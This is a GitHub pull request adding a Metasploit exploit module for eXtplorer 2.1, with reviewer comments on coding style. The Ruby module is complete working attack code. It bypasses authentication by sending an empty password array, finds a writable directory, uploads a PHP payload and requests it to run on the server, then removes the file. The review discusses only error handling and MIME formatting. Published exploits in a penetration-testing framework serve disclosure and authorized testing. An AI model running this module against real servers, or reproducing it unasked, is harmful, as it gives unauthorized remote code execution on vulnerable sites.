New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add eXtplorer v2.1 auth bypass exploit module #1221
Changes from all commits
File filter
Filter by extension
Conversations
Jump to
Diff view
Diff view
There are no files selected for viewing
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,228 @@ | ||
## | ||
# This file is part of the Metasploit Framework and may be subject to | ||
# redistribution and commercial restrictions. Please see the Metasploit | ||
# Framework web site for more information on licensing and terms of use. | ||
# http://metasploit.com/framework/ | ||
## | ||
|
||
require 'msf/core' | ||
|
||
class Metasploit3 < Msf::Exploit::Remote | ||
Rank = ExcellentRanking | ||
|
||
include Msf::Exploit::Remote::HttpClient | ||
|
||
def initialize(info={}) | ||
super(update_info(info, | ||
'Name' => "eXtplorer v2.1 Arbitrary File Upload Vulnerability", | ||
'Description' => %q{ | ||
This module exploits an authentication bypass vulnerability in eXtplorer | ||
versions 2.1.0 to 2.1.2 and 2.1.0RC5 when run as a standalone application. | ||
This application has an upload feature that allows an authenticated user | ||
with administrator roles to upload arbitrary files to any writable | ||
directory in the web root. This module uses an authentication bypass | ||
vulnerability to upload and execute a file. | ||
}, | ||
'License' => MSF_LICENSE, | ||
'Author' => | ||
[ | ||
'Brendan Coles <bcoles[at]gmail.com>' # Discovery and exploit | ||
], | ||
'References' => | ||
[ | ||
['URL', 'http://itsecuritysolutions.org/2012-12-31-eXtplorer-v2.1-authentication-bypass-vulnerability'], | ||
['URL', 'http://extplorer.net/issues/105'] | ||
], | ||
'Payload' => | ||
{ | ||
'BadChars' => "\x00" | ||
}, | ||
'DefaultOptions' => | ||
{ | ||
'ExitFunction' => "none" | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. you probably don't even need DefaultOptions at all. |
||
}, | ||
'Platform' => 'php', | ||
'Arch' => ARCH_PHP, | ||
'Targets' => | ||
[ | ||
['Automatic Targeting', { 'auto' => true }] | ||
], | ||
'Privileged' => false, | ||
'DisclosureDate' => "Dec 31 2012", | ||
'DefaultTarget' => 0)) | ||
|
||
register_options( | ||
[ | ||
OptString.new('TARGETURI', [true, 'The path to the web application', '/com_extplorer_2.1.0/']), | ||
OptString.new('USERNAME', [true, 'The username for eXtplorer', 'admin']) | ||
], self.class) | ||
end | ||
|
||
def check | ||
|
||
base = target_uri.path | ||
base << '/' if base[-1, 1] != '/' | ||
peer = "#{rhost}:#{rport}" | ||
|
||
# retrieve software version from ./extplorer.xml | ||
begin | ||
res = send_request_cgi({ | ||
'method' => 'GET', | ||
'uri' => "#{base}extplorer.xml" | ||
}) | ||
|
||
return Exploit::CheckCode::Vulnerable if res and res.code == 200 and res.body =~ /<version>2\.1\.(0RC5|0|1|2)<\/version>/ | ||
return Exploit::CheckCode::Detected if res and res.code == 200 and res.body =~ /eXtplorer/ | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Seems like you could move the "if res and res.code == 200" into a parent if statement, and make these lines a bit shorter, then use an else for the safe check code. |
||
return Exploit::CheckCode::Safe | ||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout | ||
print_error("#{peer} - Connection failed") | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. I would like to see this as either a fail_with or print_warning. I expect you want to continue down to the return Unknown checkcode, so I would use print_warning. There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. fail_with will exit the module. The check() should still return something when it can. |
||
end | ||
return Exploit::CheckCode::Unknown | ||
|
||
end | ||
|
||
def on_new_session(client) | ||
if client.type == "meterpreter" | ||
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") | ||
client.fs.file.rm("#{@fname}") | ||
else | ||
client.shell_command_token("rm #{@fname}") | ||
end | ||
end | ||
|
||
def upload(base, dir, fname, file) | ||
|
||
boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(10)}" | ||
data_post = "--#{boundary}\r\n" | ||
data_post << "Content-Disposition: form-data; name=\"userfile[0]\"; filename=\"#{fname}\"\r\n" | ||
data_post << "Content-Type: application/x-httpd-php\r\n" | ||
data_post << "\r\n#{file}\r\n" | ||
data_post << "--#{boundary}\r\n" | ||
data_post << "Content-Disposition: form-data; name=\"overwrite_files\"\r\n\r\non\r\n" | ||
data_post << "--#{boundary}\r\n" | ||
data_post << "Content-Disposition: form-data; name=\"dir\"\r\n\r\n%2f#{dir}\r\n" | ||
data_post << "--#{boundary}\r\n" | ||
data_post << "Content-Disposition: form-data; name=\"option\"\r\n\r\ncom_extplorer\r\n" | ||
data_post << "--#{boundary}\r\n" | ||
data_post << "Content-Disposition: form-data; name=\"action\"\r\n\r\nupload\r\n" | ||
data_post << "--#{boundary}\r\n" | ||
data_post << "Content-Disposition: form-data; name=\"requestType\"\r\n\r\nxmlhttprequest\r\n" | ||
data_post << "--#{boundary}\r\n" | ||
data_post << "Content-Disposition: form-data; name=\"confirm\"\r\n\r\ntrue\r\n" | ||
data_post << "--#{boundary}\r\n" | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. It would be great if this were actually a Rex::Mime::Message, it is for this specifically. There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Rex::Mime::Message is preferred for sure. However, if that function is failing for you for some reason.... make sure the extra \r\n isn't the reason why it's failing. Usually I do this to filter that out: gsub(/^\r\n--Part/, '--Part') |
||
|
||
res = send_request_cgi({ | ||
'method' => 'POST', | ||
'uri' => "#{base}index.php", | ||
'ctype' => "multipart/form-data; boundary=#{boundary}", | ||
'data' => data_post, | ||
'cookie' => datastore['COOKIE'], | ||
}) | ||
|
||
return res | ||
end | ||
|
||
def auth_bypass(base, user) | ||
|
||
res = send_request_cgi({ | ||
'method' => 'POST', | ||
'uri' => "#{base}index.php", | ||
'data' => "option=com_extplorer&action=login&type=extplorer&username=#{user}&password[]=", | ||
'cookie' => datastore['COOKIE'], | ||
}) | ||
return res | ||
|
||
end | ||
|
||
def exploit | ||
|
||
base = target_uri.path | ||
base << '/' if base[-1, 1] != '/' | ||
@peer = "#{rhost}:#{rport}" | ||
@fname= rand_text_alphanumeric(rand(10)+6) + '.php' | ||
user = datastore['USERNAME'] | ||
datastore['COOKIE'] = "eXtplorer="+rand_text_alpha_lower(26)+";" | ||
|
||
# bypass auth | ||
print_status("#{@peer} - Authenticating as user (#{user})") | ||
res = auth_bypass(base, user) | ||
if res and res.code == 200 and res.body =~ /Are you sure you want to delete these/ | ||
print_status("#{@peer} - Authenticated successfully") | ||
else | ||
print_error("#{@peer} - Authentication failed") | ||
return | ||
end | ||
|
||
# search for writable directories | ||
print_status("#{@peer} - Retrieving writable subdirectories") | ||
begin | ||
res = send_request_cgi({ | ||
'method' => 'POST', | ||
'uri' => "#{base}index.php", | ||
'cookie' => datastore['COOKIE'], | ||
'data' => "option=com_extplorer&action=getdircontents&dir=#{base}&sendWhat=dirs&node=ext_root", | ||
}) | ||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout | ||
print_error("#{@peer} - Connection failed") | ||
return | ||
end | ||
if res and res.code == 200 and res.body =~ /\{'text':'([^']+)'[^\}]+'is_writable':true/ | ||
dir = "#{base}#{$1}" | ||
print_status("#{@peer} - Successfully retrieved writable subdirectory (#{$1})") | ||
else | ||
dir = "#{base}" | ||
print_error("#{@peer} - Could not find a writable subdirectory.") | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Instead of using these print_errors and then returning (or forgetting to return like here), you should check out fail_with. A quick rgrep of the modules/ directory will give you many examples. There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. On the other hand, if this was on purpose and you expected execution of the script to continue, you should make this a print_warning. The other print_errors should still be fail_with There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. fail_with() will exit the module, that doesn't look like that's what he wants. print_error() is ok with me in this case, really. There's never been any solid guidelines on when to use print_warning or print_error....... I added print_warning() because some modules used to modify datastore options directly.... so if it's absolutely necessary in that case, print_warning() is used to warn the user that the option is being modified. I also use print_warning() when the module is touching the file system on the victim machine (ie. during exploit cleanup). |
||
end | ||
|
||
# upload PHP payload | ||
print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes) to #{dir}") | ||
php = %Q|<?php #{payload.encoded} ?>| | ||
begin | ||
res = upload(base, dir, @fname, php) | ||
if res and res.code == 200 and res.body =~ /'message':'Upload successful\!'/ | ||
print_good("#{@peer} - File uploaded successfully") | ||
else | ||
print_error("#{@peer} - Uploading PHP payload failed") | ||
return | ||
end | ||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout | ||
print_error("#{@peer} - Connection failed") | ||
return | ||
end | ||
|
||
# search directories in the web root for the file | ||
print_status("#{@peer} - Searching directories for file (#{@fname})") | ||
begin | ||
res = send_request_cgi({ | ||
'method' => 'POST', | ||
'uri' => "#{base}index.php", | ||
'data' => "start=0&limit=10&option=com_extplorer&action=search&dir=#{base}&content=0&subdir=1&searchitem=#{@fname}", | ||
'cookie' => datastore['COOKIE'], | ||
}) | ||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout | ||
print_error("#{@peer} - Connection failed") | ||
return | ||
end | ||
if res and res.code == 200 and res.body =~ /'dir':'\\\/([^']+)'/ | ||
dir = $1.gsub('\\','') | ||
print_good("#{@peer} - Successfully found file") | ||
else | ||
print_error("#{@peer} - Failed to find file") | ||
end | ||
|
||
# retrieve and execute PHP payload | ||
print_status("#{@peer} - Executing payload (/#{dir}/#{@fname})") | ||
begin | ||
send_request_cgi({ | ||
'method' => 'GET', | ||
'uri' => "/#{dir}/#{@fname}" | ||
}) | ||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout | ||
print_error("#{@peer} - Connection failed") | ||
return | ||
end | ||
if res and res.code != 200 | ||
print_error("#{@peer} - Executing payload failed") | ||
end | ||
end | ||
end |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This is kinda a weird habit we do. We tend to leave BadChars => "\x00" in there when there are no bad chars at all. If this is the case for you, please feel free to remove the Payload option.